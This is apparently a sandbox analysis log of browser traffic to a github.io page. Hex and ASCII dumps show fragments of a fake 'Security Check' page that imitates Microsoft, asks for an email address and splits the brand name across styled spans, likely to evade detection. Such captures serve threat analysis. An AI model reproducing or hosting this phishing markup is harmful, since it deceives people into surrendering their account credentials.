                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:24:51 UTC689OUTGET /favicon.ico HTTP/1.1
                                                        Host: procustodiavalueslive.github.io
                                                        Connection: keep-alive
                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                        sec-ch-ua-mobile: ?0
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        sec-ch-ua-platform: "Windows"
                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                        Sec-Fetch-Site: same-origin
                                                        Sec-Fetch-Mode: no-cors
                                                        Sec-Fetch-Dest: image
                                                        Referer: https://procustodiavalueslive.github.io/mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:24:51 UTC637INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        Content-Length: 9115
                                                        Server: GitHub.com
                                                        Content-Type: text/html; charset=utf-8
                                                        permissions-policy: interest-cohort=()
                                                        ETag: "6765c4f0-239b"
                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
                                                        X-GitHub-Request-Id: D9B9:2C71CC:21C7634:2644E88:67830BD3
                                                        Accept-Ranges: bytes
                                                        Age: 0
                                                        Date: Sun, 12 Jan 2025 00:24:51 GMT
                                                        Via: 1.1 varnish
                                                        X-Served-By: cache-nyc-kteb1890083-NYC
                                                        X-Cache: MISS
                                                        X-Cache-Hits: 0
                                                        X-Timer: S1736641491.195451,VS0,VE20
                                                        Vary: Accept-Encoding
                                                        X-Fastly-Request-ID: 6d93e7a124ee5efa3b68b7f6e676f8a2713ce3d7
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 73 74 79 6c 65 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 3b 20 69 6d 67 2d 73 72 63 20 64 61 74 61 3a 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"> <title>S
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 20 32 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 31 39 32 64 70 69 29 2c 0a 20 20 20 20 20 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 32 64 70 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 31 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 20 7d 0a 20 20 20 20 20 20 20 20 2e 6c 6f 67 6f 2d 69 6d 67 2d 32 78 20 7b 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 20 7d 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 23 73 75
                                                        Data Ascii: ice-pixel-ratio: 2), only screen and ( min-resolution: 192dpi), only screen and ( min-resolution: 2dppx) { .logo-img-1x { display: none; } .logo-img-2x { display: inline-block; } } #su
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62
                                                        Data Ascii: x4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvb
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 45 39 46 4e 72 67 77 42 43 4c 69 72 4d 46 56 39 4f 6b 68 35 65 66 6c 46 68 38 50 52 35 6e 4b 35 6e 44 61 62 72 52 32 42 4e 4a 6c 4b 4f 30 54 33 35 2b 4c 69 34 6e 34 2b 2f 4a 2b 2f 4a 51 43 78 68 6d 75 35 68 33 75 4a 6f 58 4e 48 50 62 6d 57 5a 41 48 4d 73 68 57 42 38 6c 35 2f 69 70 71 61 6d 6d 61 41 66 30 7a 50 44 44 78 31 4f 4e 56 33 76 75 72 64 69 64 71 77 41 51 4c 2b 70 45 63 38 73 4c 63 41 65 31 43 43 76 51 33 59 48 78 49 57 38 50 6c 38 35 78 53 57 4e 43 31 68 41 44 44 49 76 30 72 49 45 2f 6f 34 4a 30 6b 33 6b 77 77 34 78 53 6c 77 49 68 63 71 33 45 46 46 4f 6d 37 4b 4e 2f 68 55 47 4f 51 6b 74 30 43 46 61 35 57 70 4e 4a 6c 4d 76 78 42 45 7a 2f 49 56 51 41 78 67 2f 5a 52 5a 6c 39 77 69 48 41 36 33 79 44 59 69 65 4d 37 44 6e 4c 50 35 43 69 41 47 73 43 37
                                                        Data Ascii: E9FNrgwBCLirMFV9Okh5eflFh8PR5nK5nDabrR2BNJlKO0T35+Li4n4+/J+/JQCxhmu5h3uJoXNHPbmWZAHMshWB8l5/ipqammaAf0zPDDx1ONV3vurdidqwAQL+pEc8sLcAe1CCvQ3YHxIW8Pl85xSWNC1hADDIv0rIE/o4J0k3kww4xSlwIhcq3EFFOm7KN/hUGOQkt0CFa5WpNJlMvxBEz/IVQAxg/ZRZl9wiHA63yDYieM7DnLP5CiAGsC7
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4d 79 31 6a 4d 44 45 78 49 44 59 32 4c 6a 45 30 4e 54 59 32 4d 53 77 67 4d 6a 41 78 4d 69 38 77 4d 69 38 77 4e 69 30 78 4e 44 6f 31 4e 6a 6f 79 4e 79 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68
                                                        Data Ascii: b2JlIFhNUCBDb3JlIDUuMy1jMDExIDY2LjE0NTY2MSwgMjAxMi8wMi8wNi0xNDo1NjoyNyAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wPSJodHRwOi8vbnMuYWRvYmUuY29tL3h
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 74 34 32 66 2b 4d 70 30 79 55 54 56 51 62 64 57 73 41 48 56 73 69 6b 64 69 48 6b 48 61 50 78 63 51 58 51 75 66 58 67 55 42 67 4d 52 78 6d 65 39 55 30 41 41 78 66 48 34 76 46 76 6a 4d 37 65 46 36 55 6b 62 4a 53 35 71 6f 51 77 45 51 47 41 35 37 41 63 35 4a 6c 6c 46 79 55 56 5a 5a 35 63 6b 55 45 67 4d 56 78 73 4b 32 6a 6c 53 59 7a 49 2b 51 58 4a 73 69 79 6a 7a 4e 45 41 4a 79 4a 41 7a 62 2f 4b 51 61 34 31 6a 4a 4b 4c 38 70 4f 44 4d 51 69 54 45 41 79 6d 58 77 35 6e 38 2f 50 30 49 6a 44 33 62 68 37 52 67 6f 67 35 39 61 61 6e 78 69 49 52 54 56 76 56 2f 6f 6a 30 74 6e 48 63 61 2f 57 4d 72 56 77 4f 44 77 42 33 72 61 54 47 78 7a 6b 42 67 2f 67 6e 5a 56 61 70 46 56 36 32 57 79 32 6e 35 41 4f 37 30 48 4d 2f 35 77 62 4a 30 51 6e 58 79 51 53 61 56 50 44 49 75 4e 5a 7a
                                                        Data Ascii: t42f+Mp0yUTVQbdWsAHVsikdiHkHaPxcQXQufXgUBgMRxme9U0AAxfH4vFvjM7eF6UkbJS5qoQwEQGA57Ac5JllFyUVZZ5ckUEgMVxsK2jlSYzI+QXJsiyjzNEAJyJAzb/KQa41jJKL8pODMQiTEAymXw5n8/P0IjD3bh7Rgog59aanxiIRTVvV/oj0tnHca/WMrVwODwB3raTGxzkBg/gnZVapFV62Wy2n5AO70HM/5wbJ0QnXyQSaVPDIuNZz
                                                        2025-01-12 00:24:51 UTC847INData Raw: 36 73 64 34 32 39 54 55 4e 45 63 6d 55 64 63 2b 50 52 61 4c 48 63 76 6e 38 37 64 58 57 34 75 67 7a 64 73 61 47 78 75 66 4c 39 34 4e 46 76 39 7a 69 31 4a 37 47 56 62 68 6c 76 62 32 64 6e 61 4a 33 53 56 72 78 66 63 2b 6e 32 2b 4e 54 73 5a 37 2f 48 37 2f 4d 72 33 67 35 58 64 53 49 48 79 4a 53 48 31 50 5a 2b 37 66 54 6f 79 6c 32 2b 45 72 71 69 6c 67 5a 34 4e 61 4c 59 42 39 67 6f 56 47 61 48 6a 52 39 33 48 76 31 5a 72 55 34 58 44 73 46 54 32 30 6b 48 33 50 4f 62 7a 62 57 6b 30 43 67 47 31 6a 61 63 56 49 55 6e 41 51 62 39 46 2b 56 65 78 79 4c 4d 7a 6b 70 63 4c 76 30 49 4a 56 37 41 48 51 49 4f 43 41 55 59 48 78 37 76 35 71 67 53 63 6d 59 48 74 54 71 53 41 79 5a 4c 45 4a 54 4b 32 32 42 69 65 34 69 71 33 78 73 71 70 6d 34 53 41 66 39 48 71 39 61 32 44 6e 4a 34 75
                                                        Data Ascii: 6sd429TUNEcmUdc+PRaLHcvn87dXW4ugzdsaGxufL94NFv9zi1J7GVbhlvb2dnaJ3SVrxfc+n2+NTsZ7/H7/Mr3g5XdSIHyJSH1PZ+7fToyl2+ErqilgZ4NaLYB9goVGaHjR93Hv1ZrU4XDsFT20kH3PObzbWk0CgG1jacVIUnAQb9F+VexyLMzkpcLv0IJV7AHQIOCAUYHx7v5qgScmYHtTqSAyZLEJTK22Bie4iq3xsqpm4SAf9Hq9a2DnJ4u


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        2192.168.2.649715185.199.108.1534431444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-01-12 00:24:51 UTC426OUTGET /mediantime1db1d62ef90e6fec5644546bc086f16336d68481479f56e29285a338fc23/ HTTP/1.1
                                                        Host: procustodiavalueslive.github.io
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-01-12 00:24:51 UTC734INHTTP/1.1 200 OK
                                                        Connection: close
                                                        Content-Length: 19100
                                                        Server: GitHub.com
                                                        Content-Type: text/html; charset=utf-8
                                                        permissions-policy: interest-cohort=()
                                                        Last-Modified: Wed, 11 Dec 2024 16:24:08 GMT
                                                        Access-Control-Allow-Origin: *
                                                        Strict-Transport-Security: max-age=31556952
                                                        ETag: "6759bca8-4a9c"
                                                        expires: Sun, 12 Jan 2025 00:34:50 GMT
                                                        Cache-Control: max-age=600
                                                        x-proxy-cache: MISS
                                                        X-GitHub-Request-Id: C0B9:191F96:20FB513:2579BF1:67830BD1
                                                        Accept-Ranges: bytes
                                                        Date: Sun, 12 Jan 2025 00:24:51 GMT
                                                        Via: 1.1 varnish
                                                        Age: 1
                                                        X-Served-By: cache-ewr-kewr1740070-EWR
                                                        X-Cache: HIT
                                                        X-Cache-Hits: 1
                                                        X-Timer: S1736641491.233396,VS0,VE2
                                                        Vary: Accept-Encoding
                                                        X-Fastly-Request-ID: 824e473c04a34edde45f6cb523e76a7aad7f5371
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 54 69 74 6c 65 73 20 61 72 72 61 79 20 77 69 74 68 20 64 69 66 66 65 72 65 6e 74 20 76 61 72 69 61 74 69 6f 6e 73 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 74 69 74 6c 65 73 20 3d 20 5b 0d 0a 09 09 09 0d 0a 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script> // Titles array with different variations const titles = [
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 27 27 29 3b 20 2f 2a 20 44 65 66 61 75 6c 74 20 66 61 6c 6c 62 61 63 6b 20 69 6d 61 67 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 20 63 6f 76 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2e 68 65 61 64 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 37 38 64 34 3b 0d 0a 20 20 20 20
                                                        Data Ascii: 33; background-image: url(''); /* Default fallback image */ background-size: cover; background-position: center; } .header { width: 100%; background-color: #0078d4;
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 33 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72
                                                        Data Ascii: .container input[type="email"] { width: 100%; padding: 10px; margin-bottom: 20px; border: 1px solid #ccc; border-radius: 3px; font-size: 16px; box-sizing: bor
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 79 20 43 68 65 63 6b 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 4e 34 41 41 41 41 77 43 41 59 41 41 41 42 2b 4b 63 52 46 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 45 58 4e 4a 52 45 46 55 65 46 37 74 58 58 2b 63 58 46 56 31 50 2b 66 4e 62 70 61 6b 6a 50 78 53 53 59 43 67 2f 4b 68 55 43 69 57 69 38 6b 4f 69 43 4a 52 41 50 39 71 43 59 72 43 6f 6f 46 52 41 53 56 32 79 38 2b 37 62 54 62 55 56 42 72 55 6d 32 58 6e 33 7a 59 62 56 46 50 6d 49 50 35
                                                        Data Ascii: y Check</span> </div> <div class="container"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAN4AAAAwCAYAAAB+KcRFAAAAAXNSR0IArs4c6QAAEXNJREFUeF7tXX+cXFV1P+fNbpakjPxSSYCg/KhUCiWi8kOiCJRAP9qCYrCooFRASV2y8+7bTbUVBrUm2Xn3zYbVFPmIP5
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 41 76 67 76 5a 65 49 2f 74 59 41 33 6a 66 43 4d 48 78 58 4a 32 74 41 43 48 45 48 41 4a 79 70 6c 66 30 36 45 51 32 59 61 67 63 41 4e 41 47 76 57 43 7a 75 4e 54 55 31 31 65 52 54 52 4d 54 66 6d 49 64 78 32 78 67 4b 68 63 4c 2b 6e 75 65 39 44 51 42 4f 42 49 41 6a 41 57 41 66 50 70 34 43 41 4c 73 6a 2b 44 42 2f 5a 7a 36 66 76 35 63 50 2f 66 58 36 49 79 4d 6a 68 79 69 6c 75 47 79 44 45 48 46 4c 71 56 54 36 72 31 54 74 66 62 4e 53 61 67 55 41 48 41 51 41 7a 79 69 6c 76 6c 49 75 6c 78 2b 78 73 56 38 49 63 54 77 41 6e 41 45 41 78 37 41 52 41 52 48 37 6c 56 4b 37 45 58 45 43 41 42 37 71 36 2b 75 37 64 66 33 36 39 66 78 33 52 35 52 71 44 57 38 6a 6f 74 4d 51 38 53 67 41 32 49 2b 49 75 4c 30 6e 69 4f 67 52 33 68 7a 4e 37 37 45 31 7a 43 36 64 70 55 75 58 76 67 55 52
                                                        Data Ascii: AvgvZeI/tYA3jfCMHxXJ2tACHEHAJyplf06EQ2YagcANAGvWCzuNTU11eRTRMTfmIdx2xgKhcL+nue9DQBOBIAjAWAfPp4CALsj+DB/Zz6fv5cP/fX6IyMjhyiluGyDEHFLqVT6r1TtfbNSagUAHAQAzyilvlIulx+xsV8IcTwAnAEAx7ARARH7lVK7EXECAB7q6+u7df369fx3R5RqDW8jotMQ8SgA2I+IuL0niOgR3hzN77E1zC6dpUuXvgUR
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 76 4c 38 2f 7a 74 6c 65 72 56 54 37 44 4c 6a 42 34 77 49 48 63 35 30 73 70 74 2b 76 50 2b 61 78 56 71 56 51 2b 6e 67 5a 2b 6d 32 78 72 2b 45 66 54 63 4b 79 4b 55 65 43 4a 36 65 6e 70 77 38 66 48 78 33 65 62 46 59 55 51 5a 79 56 52 50 72 74 31 55 33 37 43 2f 37 63 6d 2f 47 65 4a 62 64 4a 4e 2f 66 33 39 6c 36 78 62 74 34 37 42 31 79 44 75 63 39 47 69 52 5a 38 6c 6f 6f 76 4d 43 6f 6e 68 35 66 31 52 46 4e 32 67 50 35 38 7a 71 32 5a 58 4b 2f 62 2f 53 65 46 32 77 4f 4e 50 46 45 4b 77 46 59 39 33 72 6a 6f 39 6c 38 2f 6e 46 78 65 4c 78 52 64 30 46 6f 79 4d 6a 42 77 56 78 2f 45 57 2f 52 6b 69 76 72 4f 65 33 64 41 72 34 4b 58 57 79 2f 39 4d 6e 50 70 37 47 56 4e 77 72 5a 54 79 38 6e 62 54 55 67 39 6c 79 67 49 65 49 6b 5a 68 47 48 4b 57 78 41 77 53 51 71 77 48 41 44
                                                        Data Ascii: vL8/ztlerVT7DLjB4wIHc50spt+vP+axVqVQ+ngZ+m2xr+EfTcKyKUeCJ6enpw8fHx3ebFYUQZyVRPrt1U37C/7cm/GeJbdJN/f39l6xbt47B1yDuc9GiRZ8loovMConh5f1RFN2gP58zq2ZXK/b/SeF2wONPFEKwFY93rjo9l8/nFxeLxRd0FoyMjBwVx/EW/RkivrOe3dAr4KXWy/9MnPp7GVNwrZTy8nbTUg9lygIeIkZhGHKWxAwSQqwHAD
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 75 4e 41 46 30 4a 77 79 46 71 54 4c 38 6c 55 61 7a 73 42 58 62 70 59 72 53 46 6a 62 59 44 48 44 76 4e 76 47 2b 33 2f 55 45 70 5a 38 78 46 6d 6b 52 44 69 72 77 47 67 70 6c 5a 71 31 48 51 57 72 6a 2f 33 66 66 2b 34 4e 4e 79 4c 66 58 59 63 57 7a 6d 44 45 4c 45 42 2b 69 41 49 72 69 43 69 32 6c 6d 78 54 6f 68 34 51 78 69 47 54 58 37 59 56 6d 50 30 66 5a 38 6a 69 39 69 76 31 79 44 7a 39 67 45 48 50 4f 73 73 7a 4e 30 5a 6a 37 75 7a 47 56 6d 49 69 42 32 79 72 47 61 78 67 37 6c 4f 56 76 57 6d 68 78 4b 50 58 52 59 63 4e 4b 77 76 4d 41 37 42 61 6a 68 36 73 77 42 51 66 39 2b 74 78 42 73 65 48 6a 35 65 4b 66 57 67 30 66 35 6b 50 70 2f 66 54 77 2b 2b 37 6d 5a 78 41 38 44 6c 55 73 71 57 64 35 69 6b 30 53 4d 63 67 73 66 71 71 47 65 32 72 5a 51 36 70 6c 77 75 2f 30 77 49
                                                        Data Ascii: uNAF0JwyFqTL8lUazsBXbpYrSFjbYDHDvNvG+3/UEpZ8xFmkRDirwGgplZq1HQWrj/3ff+4NNyLfXYcWzmDELEB+iAIriCi2lmxToh4QxiGTX7YVmP0fZ8ji9iv1yDz9gEHPOsszN0Zj7uzGVmIiB2yrGaxg7lOVvWmhxKPXRYcNKwvMA7Bajh6swBQf9+txBseHj5eKfWg0f5kPp/fTw++7mZxA8DlUsqWd5ik0SMcgsfqqGe2rZQ6plwu/0wI
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 71 78 32 36 42 6c 36 34 56 57 35 68 63 55 37 38 4f 65 42 30 43 4c 37 57 77 38 59 35 66 70 30 65 6c 6c 43 77 46 32 68 6b 58 65 75 4c 48 4d 31 59 4b 47 78 51 75 54 51 4b 44 50 39 30 68 41 4a 6f 53 65 57 64 7a 78 74 50 37 54 2b 38 42 35 61 73 67 4f 43 79 72 33 66 32 68 58 49 30 51 38 53 61 6c 56 43 47 4b 49 72 36 42 72 59 6d 47 68 6f 5a 65 6d 38 76 6c 4f 42 4f 6b 45 30 6d 31 75 56 71 74 66 6d 54 44 68 67 31 50 74 55 4a 70 45 41 54 48 45 42 46 48 34 4c 53 38 4e 6b 4f 72 75 79 64 52 69 7a 39 66 72 56 59 2f 31 69 37 44 59 6a 62 41 53 34 4f 2f 2b 58 78 37 72 4a 4e 34 47 67 64 73 50 31 71 79 65 2f 66 75 4c 32 54 39 55 67 2f 48 42 69 4a 69 4c 54 55 6e 6a 75 4f 48 79 75 58 79 50 65 32 32 36 69 41 49 5a 69 53 45 6d 6a 39 61 77 6d 72 73 77 4d 42 41 6b 79 51 6c 6f 68
                                                        Data Ascii: qx26Bl64VW5hcU78OeB0CL7Ww8Y5fp0ellCwF2hkXeuLHM1YKGxQuTQKDP90hAJoSeWdzxtP7T+8B5asgOCyr3f2hXI0Q8SalVCGKIr6BrYmGhoZem8vlOBOkE0m1uVqtfmTDhg1PtUJpEATHEBFH4LS8NkOruydRiz9frVY/1i7DYjbAS4O/+Xx7rJN4GgdsP1qye/fuL2T9Ug/HBiJiLTUnjuOHyuXyPe226iAIZiSEmj9awmrswMBAkyQloh
                                                        2025-01-12 00:24:51 UTC1378INData Raw: 71 75 69 72 65 64 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 69 64 3d 22 63 6f 6e 74 69 6e 75 65 2d 62 75 74 74 6f 6e 22 3e 43 6f 6e 66 69 72 6d 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 3e 42 79 20 63 6c 69 63 6b 69 6e 67 20 63 6f 6e 66 69 72 6d 20 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 46 32 35 30 32 31 3b 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 72 67 62 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 29 3b 22 3e 4d 69 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d
                                                        Data Ascii: quired style="margin-top: 10px;"> <button id="continue-button">Confirm</button> <p class="footer">By clicking confirm <span style="color:#F25021;"><span style="font-weight: 700; background-color: rgb(255, 255, 255);">Mi<span style="font-
